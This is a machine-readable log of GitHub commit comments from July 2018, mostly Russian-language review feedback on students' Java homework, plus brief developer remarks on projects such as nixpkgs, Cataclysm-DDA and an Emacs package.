{"id":"7967119977","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712161,"position":35,"line":35,"path":"src/com/itacademy/lesson2HomeWork/Task3Root.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T10:00:48Z","updated_at":"2018-07-15T10:00:48Z","author_association":"NONE","body":"сразу return b * b - 4 * a * c;"}},"created_at":"2018-07-15T10:00:48Z"}
{"id":"7967120221","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712162,"position":39,"line":39,"path":"src/com/itacademy/lesson2HomeWork/Task3Root.java","commit_id":"0646fbe8b131ae6c91289f84caf8d92aee9f7ada","created_at":"2018-07-15T10:01:01Z","updated_at":"2018-07-15T10:01:01Z","author_association":"NONE","body":"сразу return d > 0;"}},"created_at":"2018-07-15T10:01:01Z"}
{"id":"7967120960","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712163,"position":22,"line":22,"path":"src/com/itacademy/lesson3HomeWork/Task1SumNumber.java","commit_id":"99d39e2e547c75339dfc5e4dc08e30b11a0a1e31","created_at":"2018-07-15T10:01:35Z","updated_at":"2018-07-15T10:01:35Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T10:01:35Z"}
{"id":"7967121481","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712164,"position":13,"line":13,"path":"src/com/itacademy/lesson3HomeWork/Task2Fibonachy.java","commit_id":"99d39e2e547c75339dfc5e4dc08e30b11a0a1e31","created_at":"2018-07-15T10:02:04Z","updated_at":"2018-07-15T10:02:04Z","author_association":"NONE","body":"давай название переменным более осмысленные, чтобы было понятно, что там содержится"}},"created_at":"2018-07-15T10:02:04Z"}
{"id":"7967121769","type":"CommitCommentEvent","actor":{"login":"ewanlee"},"repo":{"name":"ewanlee/Interview-Notebook"},"payload":{"comment":{"id":29712165,"position":null,"line":null,"path":null,"commit_id":"cb74bea7a623d3e6b14d9e80fe10fe83ad3ff530","created_at":"2018-07-15T10:02:18Z","updated_at":"2018-07-15T10:02:18Z","author_association":"OWNER","body":"java to python2.7"}},"created_at":"2018-07-15T10:02:18Z"}
{"id":"7967121894","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29712166,"position":5,"line":12,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/UserRepository.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T10:02:25Z","updated_at":"2018-07-15T10:02:25Z","author_association":"NONE","body":"Точно?"}},"created_at":"2018-07-15T10:02:25Z"}
{"id":"7967122644","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712168,"position":20,"line":20,"path":"src/com/itacademy/lesson3HomeWork/Task2Fibonachy.java","commit_id":"99d39e2e547c75339dfc5e4dc08e30b11a0a1e31","created_at":"2018-07-15T10:03:04Z","updated_at":"2018-07-15T10:03:04Z","author_association":"NONE","body":"зачем задавать первые значения и передавать их в функцию, если это все должно быть в функции, т.к. это часть алгоритма? Только необходимые параметры нужно передавать"}},"created_at":"2018-07-15T10:03:04Z"}
{"id":"7967123809","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712172,"position":38,"line":38,"path":"src/com/itacademy/lesson3HomeWork/Task2Fibonachy.java","commit_id":"99d39e2e547c75339dfc5e4dc08e30b11a0a1e31","created_at":"2018-07-15T10:04:07Z","updated_at":"2018-07-15T10:04:07Z","author_association":"NONE","body":"очень сложно читать код, когда название переменных плохо отражают суть"}},"created_at":"2018-07-15T10:04:07Z"}
{"id":"7967124850","type":"CommitCommentEvent","actor":{"login":"jojoe77777"},"repo":{"name":"ZtechNetwork/HyperdrivePE"},"payload":{"comment":{"id":29712173,"position":14,"line":14,"path":".travis.yml","commit_id":"ed269520df14dba10de885283dd0f3c1aebd12e7","created_at":"2018-07-15T10:05:01Z","updated_at":"2018-07-15T10:05:01Z","author_association":"NONE","body":"can u not"}},"created_at":"2018-07-15T10:05:01Z"}
{"id":"7967125039","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29712174,"position":12,"line":12,"path":"src/com/itacademy/lesson3HomeWork/Task3Weather.java","commit_id":"99d39e2e547c75339dfc5e4dc08e30b11a0a1e31","created_at":"2018-07-15T10:05:11Z","updated_at":"2018-07-15T10:05:11Z","author_association":"NONE","body":"зачем объявлять переменную за циклом for. Тем самым увеличиваешь область видимости ее, так делать плохо, область видимости должна быть как можно меньше"}},"created_at":"2018-07-15T10:05:11Z"}
{"id":"7967125591","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29712175,"position":62,"line":57,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/userLoader/UserDetailsLoader.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T10:05:38Z","updated_at":"2018-07-15T10:05:38Z","author_association":"NONE","body":"Не совсем понял. Какой-то ещё бин создаёт админа?"}},"created_at":"2018-07-15T10:05:38Z"}
{"id":"7967127069","type":"CommitCommentEvent","actor":{"login":"vpodzime"},"repo":{"name":"storaged-project/libblockdev"},"payload":{"comment":{"id":29712177,"position":null,"line":null,"path":null,"commit_id":"a89afc3f5f51aea2cd2d0942cfcc69a3ab5238f6","created_at":"2018-07-15T10:06:54Z","updated_at":"2018-07-15T10:06:54Z","author_association":"CONTRIBUTOR","body":"Was there any special motivation behind this commit? It doesn't look to me like an improvement."}},"created_at":"2018-07-15T10:06:54Z"}
{"id":"7967127075","type":"CommitCommentEvent","actor":{"login":"janschreiber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29712178,"position":16,"line":25361,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"cba3a7f8c1c8888d9da6db44f51a5adcda9be201","created_at":"2018-07-15T10:06:54Z","updated_at":"2018-07-15T10:06:54Z","author_association":"MEMBER","body":"Erledigt:\r\ndbc0f50870ab38107448038bd6faa0cf630c648e"}},"created_at":"2018-07-15T10:06:54Z"}
{"id":"7967127089","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29712179,"position":5,"line":66,"path":"ControlPanelDynamic/pom.xml","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T10:06:56Z","updated_at":"2018-07-15T10:06:56Z","author_association":"NONE","body":"Просто из интереса - что эта строчка чинит?"}},"created_at":"2018-07-15T10:06:56Z"}
{"id":"7967127451","type":"CommitCommentEvent","actor":{"login":"BevapDin"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29712180,"position":107,"line":880,"path":"src/catalua.cpp","commit_id":"e4df08524b4a0f38e996d88ba7c4b9b268e13851","created_at":"2018-07-15T10:07:14Z","updated_at":"2018-07-15T10:07:14Z","author_association":"CONTRIBUTOR","body":"Yeah, it's the wrong Lua call (needs to be `lua_pcall`). I have fixed it somewhere (found it: force pushed it now). But this is not an active branch anyway.\r\n\r\nThe current \"active\" development happens on the various \"catalua\" branches (currently it's \"catalua.sunday\", but it's supposed to be named \"catalua\"). That branch contains a (hopefully) full integration of Lua, along with callbacks, scriptable C++ values/behaviour and automatic extraction of C++ types and functions to Lua. It's nearly complete (need to do some testing and lots of documentation).\r\n"}},"created_at":"2018-07-15T10:07:14Z"}
{"id":"7967128531","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29712184,"position":null,"line":null,"path":null,"commit_id":"c87bf9331a7bc31925043526d71ed947dbb7bd8c","created_at":"2018-07-15T10:08:12Z","updated_at":"2018-07-15T10:08:12Z","author_association":"COLLABORATOR","body":"Wenn es nicht vollständig mit MIUI kompatibel ist, mit was dann 🤣?"}},"created_at":"2018-07-15T10:08:12Z"}
{"id":"7967130389","type":"CommitCommentEvent","actor":{"login":"ldir-EDB0"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":29712187,"position":null,"line":null,"path":null,"commit_id":"52cbc000aed8da9b3bd511fe7ffda7c8ae3a0eb0","created_at":"2018-07-15T10:09:53Z","updated_at":"2018-07-15T10:09:53Z","author_association":"CONTRIBUTOR","body":"Yes exactly the same stream of errors that I saw at 0100 ish this morning :-)"}},"created_at":"2018-07-15T10:09:53Z"}
{"id":"7967131306","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29712188,"position":46,"line":45,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/entities/User.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T10:10:38Z","updated_at":"2018-07-15T10:10:38Z","author_association":"NONE","body":"Что послужило причиной для переименования?"}},"created_at":"2018-07-15T10:10:38Z"}
{"id":"7967136744","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29712197,"position":null,"line":null,"path":null,"commit_id":"1a7dac02a8132e6846467f7b641a41694e90e768","created_at":"2018-07-15T10:15:21Z","updated_at":"2018-07-15T10:15:21Z","author_association":"MEMBER","body":"> chris2: we have like 12 tools to detect duplicate files\r\n>        we need a tool to detect duplicate file detectors\r\n13 and counting..."}},"created_at":"2018-07-15T10:15:21Z"}
{"id":"7967138176","type":"CommitCommentEvent","actor":{"login":"X-Cli"},"repo":{"name":"cloudflare/cloudflare-blog"},"payload":{"comment":{"id":29712199,"position":null,"line":null,"path":null,"commit_id":"765d4b663d74b0a77a646a1810b3f8ec3d64ea03","created_at":"2018-07-15T10:16:33Z","updated_at":"2018-07-15T10:16:33Z","author_association":"NONE","body":"I believe this patch solves the issue! \\o/"}},"created_at":"2018-07-15T10:16:33Z"}
{"id":"7967138618","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712201,"position":75,"line":75,"path":"src/homeTasks/lesson2/FirstTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:16:57Z","updated_at":"2018-07-15T10:16:57Z","author_association":"NONE","body":"лучше вынести в отдельную функцию, как на занятиях мы делали"}},"created_at":"2018-07-15T10:16:57Z"}
{"id":"7967138753","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29712202,"position":null,"line":null,"path":null,"commit_id":"c87bf9331a7bc31925043526d71ed947dbb7bd8c","created_at":"2018-07-15T10:17:04Z","updated_at":"2018-07-15T10:17:04Z","author_association":"COLLABORATOR","body":"Für MIUI9 funktioniert es und für MIUI10 halt nicht komplett, was soll das jetzt wieder?"}},"created_at":"2018-07-15T10:17:04Z"}
{"id":"7967138950","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712204,"position":105,"line":105,"path":"src/homeTasks/lesson2/FirstTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:17:14Z","updated_at":"2018-07-15T10:17:14Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T10:17:14Z"}
{"id":"7967139506","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712207,"position":101,"line":101,"path":"src/homeTasks/lesson2/FirstTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:17:42Z","updated_at":"2018-07-15T10:17:42Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T10:17:42Z"}
{"id":"7967139995","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29712209,"position":null,"line":null,"path":null,"commit_id":"af1313e91552e42a4419b396b3026319c60fc17f","created_at":"2018-07-15T10:18:11Z","updated_at":"2018-07-15T10:18:11Z","author_association":"MEMBER","body":"> But the patch fetched in that commit actually ends up to be empty. That has happened to me more often than I'd like and I recognize the hash by now :grin:\r\n\r\n@timokau You're sure that patch is empty? That would be fatal because it should fix a security vulnerability. I checked the hash and it seems to be correct."}},"created_at":"2018-07-15T10:18:11Z"}
{"id":"7967140626","type":"CommitCommentEvent","actor":{"login":"osherdp"},"repo":{"name":"gregoil/rotest"},"payload":{"comment":{"id":29712211,"position":36,"line":48,"path":"src/rotest/common/utils.py","commit_id":"379e90b770b330c7ed583838cfbe77e51ad2e62b","created_at":"2018-07-15T10:18:44Z","updated_at":"2018-07-15T10:18:44Z","author_association":"COLLABORATOR","body":"The description doesn't sound right "}},"created_at":"2018-07-15T10:18:44Z"}
{"id":"7967140848","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712212,"position":28,"line":28,"path":"src/homeTasks/lesson2/SecondTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:18:57Z","updated_at":"2018-07-15T10:18:57Z","author_association":"NONE","body":"наверное, лучше написать как минимум один из параметров, а не ровно один)"}},"created_at":"2018-07-15T10:18:57Z"}
{"id":"7967141067","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29712213,"position":null,"line":null,"path":null,"commit_id":"c87bf9331a7bc31925043526d71ed947dbb7bd8c","created_at":"2018-07-15T10:19:09Z","updated_at":"2018-07-15T10:19:09Z","author_association":"COLLABORATOR","body":"\"Dieses Thema ist nicht mit der auf Ihrem Gerät installierten Version von MIUI kompatibel. Einige Teile von MIUI funktionieren möglicher\nweise nicht richtig, wenn Sie dieses Thema anwenden.\""}},"created_at":"2018-07-15T10:19:09Z"}
{"id":"7967141213","type":"CommitCommentEvent","actor":{"login":"mrGlebao"},"repo":{"name":"duplyakin/ControlPanel"},"payload":{"comment":{"id":29712214,"position":56,"line":73,"path":"ControlPanelDynamic/src/main/java/com/sbt/test/repository/SpringDataUserRepositoryProxy.java","commit_id":"4c1f87bd89159f1f77468b96968f9ef1811ce080","created_at":"2018-07-15T10:19:17Z","updated_at":"2018-07-15T10:19:17Z","author_association":"NONE","body":"Мы сохраняем юзера, даже если не получилось добавить его в леджер\r\nТакое поведение является целевым?"}},"created_at":"2018-07-15T10:19:17Z"}
{"id":"7967141647","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712215,"position":59,"line":59,"path":"src/homeTasks/lesson2/SecondTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:19:39Z","updated_at":"2018-07-15T10:19:39Z","author_association":"NONE","body":"по условию задачи, нужно было узнать, вмещаются ли оба дома в указанный участок, а не по одному в отдельности"}},"created_at":"2018-07-15T10:19:39Z"}
{"id":"7967141934","type":"CommitCommentEvent","actor":{"login":"kursjan"},"repo":{"name":"kursjan/petitparser2"},"payload":{"comment":{"id":29712216,"position":null,"line":null,"path":null,"commit_id":"00c506129302c3d959ff3f73af451f370d7e54f6","created_at":"2018-07-15T10:19:57Z","updated_at":"2018-07-15T10:19:57Z","author_association":"OWNER","body":"Awesome, thanks for updating the doc!"}},"created_at":"2018-07-15T10:19:57Z"}
{"id":"7967141993","type":"CommitCommentEvent","actor":{"login":"timokau"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29712217,"position":null,"line":null,"path":null,"commit_id":"af1313e91552e42a4419b396b3026319c60fc17f","created_at":"2018-07-15T10:20:01Z","updated_at":"2018-07-15T10:20:01Z","author_association":"CONTRIBUTOR","body":"Yes, to be sure I built this myself and checked the file `/nix/store/0y4pbvbislv5rg4z4j4p40zq44qal4vs-CVE-2018-10895.patch`. It was empty."}},"created_at":"2018-07-15T10:20:01Z"}
{"id":"7967142616","type":"CommitCommentEvent","actor":{"login":"timokau"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29712218,"position":null,"line":null,"path":null,"commit_id":"af1313e91552e42a4419b396b3026319c60fc17f","created_at":"2018-07-15T10:20:32Z","updated_at":"2018-07-15T10:20:32Z","author_association":"CONTRIBUTOR","body":"Probably the glob `*` gets expanded to multiple arguments, causing `filterdiff` to fail."}},"created_at":"2018-07-15T10:20:32Z"}
{"id":"7967142708","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712219,"position":32,"line":32,"path":"src/homeTasks/lesson2/ThirdTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:20:37Z","updated_at":"2018-07-15T10:20:37Z","author_association":"NONE","body":"во всех функциях своих ты каждый раз вычисляешь заново дискриминант и передаешь 3 параметра. А можно было передавать уже вычисленный в самом начале дискриминант. Иначе не оптимально написана программа"}},"created_at":"2018-07-15T10:20:37Z"}
{"id":"7967142717","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29712220,"position":null,"line":null,"path":null,"commit_id":"c87bf9331a7bc31925043526d71ed947dbb7bd8c","created_at":"2018-07-15T10:20:38Z","updated_at":"2018-07-15T10:20:38Z","author_association":"COLLABORATOR","body":"Dann würde ich den String komplett neu übersetzten, hat sich ja auch geändert."}},"created_at":"2018-07-15T10:20:38Z"}
{"id":"7967143080","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712222,"position":39,"line":39,"path":"src/homeTasks/lesson2/ThirdTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:20:58Z","updated_at":"2018-07-15T10:20:58Z","author_association":"NONE","body":"сразу return b*b-4*a*c;"}},"created_at":"2018-07-15T10:20:58Z"}
{"id":"7967143515","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"kaushikcfd/PyOP2"},"payload":{"comment":{"id":29712223,"position":8,"line":556,"path":"pyop2/codegen/rep2loopy.py","commit_id":"5c3d4ded05edcf8ce2faf2bd799a3b344647c47b","created_at":"2018-07-15T10:21:21Z","updated_at":"2018-07-15T10:21:21Z","author_association":"NONE","body":"@kaushikcfd Where does the \"3\" come from?"}},"created_at":"2018-07-15T10:21:21Z"}
{"id":"7967143828","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712224,"position":55,"line":55,"path":"src/homeTasks/lesson2/ThirdTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:21:38Z","updated_at":"2018-07-15T10:21:38Z","author_association":"NONE","body":"сразу return discriminant!=0"}},"created_at":"2018-07-15T10:21:38Z"}
{"id":"7967144063","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29712225,"position":47,"line":47,"path":"src/homeTasks/lesson2/ThirdTask.java","commit_id":"016cda9085911a74fffa33be3531e5d4055a63b7","created_at":"2018-07-15T10:21:52Z","updated_at":"2018-07-15T10:21:52Z","author_association":"NONE","body":"усложняешь код, везде сразу можно return делать и все"}},"created_at":"2018-07-15T10:21:52Z"}
{"id":"7967144287","type":"CommitCommentEvent","actor":{"login":"jebek29"},"repo":{"name":"ethchange/smart-exchange"},"payload":{"comment":{"id":29712226,"position":13,"line":105,"path":"README.md","commit_id":"c1865c012d88bce3b45ea58f0bc4ccedd3eedf5f","created_at":"2018-07-15T10:22:04Z","updated_at":"2018-07-15T10:22:04Z","author_association":"NONE","body":"J"}},"created_at":"2018-07-15T10:22:04Z"}
{"id":"7967144709","type":"CommitCommentEvent","actor":{"login":"drealecs"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29712227,"position":null,"line":null,"path":null,"commit_id":"e33056b35709d9f26f4a13762bc8eddd3bd3eef8","created_at":"2018-07-15T10:22:24Z","updated_at":"2018-07-15T10:22:24Z","author_association":"NONE","body":"Let's ask here: https://github.com/tensorflow/tensorflow/pull/19820"}},"created_at":"2018-07-15T10:22:24Z"}
{"id":"7967152875","type":"CommitCommentEvent","actor":{"login":"rahulgadhyan"},"repo":{"name":"saurako/traccar"},"payload":{"comment":{"id":29712246,"position":41,"line":90,"path":"src/org/traccar/reports/Route.java","commit_id":"bba58ddf2147858e873b636ddb8fc661f2039b37","created_at":"2018-07-15T10:29:46Z","updated_at":"2018-07-15T10:29:46Z","author_association":"COLLABORATOR","body":"In line 90, check something like:\r\nif(result.contains(previous) == false) {\r\n     result.add(previous)\r\n....\r\nin order to improve the smoothness of the graph, we add the point just before the drop happened if it is not already present."}},"created_at":"2018-07-15T10:29:46Z"}
{"id":"7967153218","type":"CommitCommentEvent","actor":{"login":"DocOBITCOIN"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29712249,"position":null,"line":null,"path":null,"commit_id":"737ad094a0b03539ced951b32884f07c0f021782","created_at":"2018-07-15T10:30:07Z","updated_at":"2018-07-15T10:30:07Z","author_association":"NONE","body":"Bias"}},"created_at":"2018-07-15T10:30:07Z"}
{"id":"7967153587","type":"CommitCommentEvent","actor":{"login":"eriksl"},"repo":{"name":"OpenPLi/openpli-oe-core"},"payload":{"comment":{"id":29712252,"position":null,"line":null,"path":null,"commit_id":"9feef224a548ffea5edbca87f2e04771c4437740","created_at":"2018-07-15T10:30:23Z","updated_at":"2018-07-15T10:30:23Z","author_association":"MEMBER","body":"Why not simply make the transition completely then?"}},"created_at":"2018-07-15T10:30:23Z"}
{"id":"7967153646","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712253,"position":9,"line":9,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:30:26Z","updated_at":"2018-07-15T10:30:26Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T10:30:26Z"}
{"id":"7967153798","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712254,"position":11,"line":11,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:30:33Z","updated_at":"2018-07-15T10:30:33Z","author_association":"NONE","body":"\r\nне надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T10:30:33Z"}
{"id":"7967154224","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712255,"position":24,"line":24,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:30:55Z","updated_at":"2018-07-15T10:30:55Z","author_association":"NONE","body":"сразу в if пихай функцию, не надо переменную создавать"}},"created_at":"2018-07-15T10:30:55Z"}
{"id":"7967155542","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712256,"position":41,"line":41,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:32:05Z","updated_at":"2018-07-15T10:32:05Z","author_association":"NONE","body":"два раза вызывается функция isTemopral, не хорошо, либо результат функции сохраняй в переменной отдельной, либо корректно сделать if-else"}},"created_at":"2018-07-15T10:32:05Z"}
{"id":"7967156296","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712258,"position":54,"line":54,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:32:44Z","updated_at":"2018-07-15T10:32:44Z","author_association":"NONE","body":"не надо все выражение заворачивать в скобочки дополнительные"}},"created_at":"2018-07-15T10:32:44Z"}
{"id":"7967156742","type":"CommitCommentEvent","actor":{"login":"joaotavora"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29712259,"position":null,"line":null,"path":null,"commit_id":"ff1cd4187d801396db437f0c5e8bd15821416cf7","created_at":"2018-07-15T10:33:08Z","updated_at":"2018-07-15T10:33:08Z","author_association":"OWNER","body":"R Primus <notifications@github.com> writes:\n\n> On Sat, Jul 14, 2018 at 10:00:52AM -0700, João Távora wrote:\n>>\"Cleanup trailing whitespace\" would be slightly more useful, otherwise OK.\n>\n> Sat 14 Jul 2018 19:24:42 BST\n>\n> Cheers.\n>\n>> As an added bonus, if you are using Emacs >= 24.4 and vc-dir to\n>> prepare your commits, Emacs does that for you automatically.\n>\n> I've read [Emacs VC]\n> (https://www.gnu.org/software/emacs/manual/html_node/emacs/Introduction-to-VC.html#Introduction-to-VC)\n>\n> and have [Change Logs]\n> (https://www.gnu.org/prep/standards/html_node/Change-Logs.html#Change-Logs) in \n> the queue.\n>\n> Where can I find details of setting up Emacs to have commit messages\n> import the ChangeLog style log messages?\n\nI don't know exactly, but there's an ongoing discussion in emacs-devel\nabout this and I've recently proposed a number of small changes that\nwill make this slightly easier in the future.\n\nFor now, do this.  From the diff buff, or from the code itself type\n\n   C-x 4 a\n\non every \"entity\" (code function, doc section, ...) that you wish to\ndeclare changed.  This goes into the ChangeLog buffer/file (my patch\nwill make it possible that the ChangeLog buffer is only a buffer, btw).\n\nOnce you are content with your messages, select a number of files from\nthe *vc-dir* buffer, or if only one file, place yourself in that file.\nType `M-x vc-next-action', or C-x v v.  It should automatically detect\nand retrieve the entries from the ChangeLog buffer into the newly\ncreated *vc-log* buffer.\n\nIf it doesn't, press C-c C-a from the *vc-log* buffer (you can do this\nat any time).\n\nPress C-c C-c from the *vc-log* buffer to actually make the commit.\n\nPress M-x vc-push from *vc-dir* or from any file in the project to\npush (though I do this from the command line).\n\nHTH!\nJoão\n"}},"created_at":"2018-07-15T10:33:08Z"}
{"id":"7967156827","type":"CommitCommentEvent","actor":{"login":"poken1122"},"repo":{"name":"poken1122/22"},"payload":{"comment":{"id":29712260,"position":null,"line":null,"path":null,"commit_id":"e20a87fd02851819bb46d72a9dfb27afed01fd96","created_at":"2018-07-15T10:33:12Z","updated_at":"2018-07-15T10:33:12Z","author_association":"OWNER","body":"{\r\n  \"type\": \"template\",\r\n  \"altText\": \"this is a buttons template\",\r\n  \"template\": {\r\n    \"type\": \"buttons\",\r\n    \"actions\": [\r\n      {\r\n        \"type\": \"message\",\r\n        \"label\": \"手環\",\r\n        \"text\": \"隊伍\"\r\n      }\r\n    ],\r\n    \"thumbnailImageUrl\": \"SPECIFY_YOUR_IMAGE_URL\",\r\n    \"title\": \"測試\",\r\n    \"text\": \"測試\"\r\n  }\r\n}"}},"created_at":"2018-07-15T10:33:12Z"}
{"id":"7967157370","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712263,"position":80,"line":80,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:33:40Z","updated_at":"2018-07-15T10:33:40Z","author_association":"NONE","body":"функцию isTemporal тебе надо вызывать только если месяц равен 2, не оптимально сделано"}},"created_at":"2018-07-15T10:33:40Z"}
{"id":"7967157697","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712265,"position":30,"line":30,"path":"src/homeWork/hw2/TaskThree.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:33:59Z","updated_at":"2018-07-15T10:33:59Z","author_association":"NONE","body":"сразу return b * b - 4 * a * c;"}},"created_at":"2018-07-15T10:33:59Z"}
{"id":"7967158169","type":"CommitCommentEvent","actor":{"login":"fmerges"},"repo":{"name":"ApachePointObservatory/PyGuide"},"payload":{"comment":{"id":29712266,"position":8,"line":18,"path":"tests/timeCentroid.py","commit_id":"3c5777468a2591720dd58e49968b101f830e46be","created_at":"2018-07-15T10:34:22Z","updated_at":"2018-07-15T10:34:22Z","author_association":"NONE","body":"Hello,\r\nWhy add a new dependency using past.utils for old_div when you can use // which is available in both versions of Python?\r\nCheers."}},"created_at":"2018-07-15T10:34:22Z"}
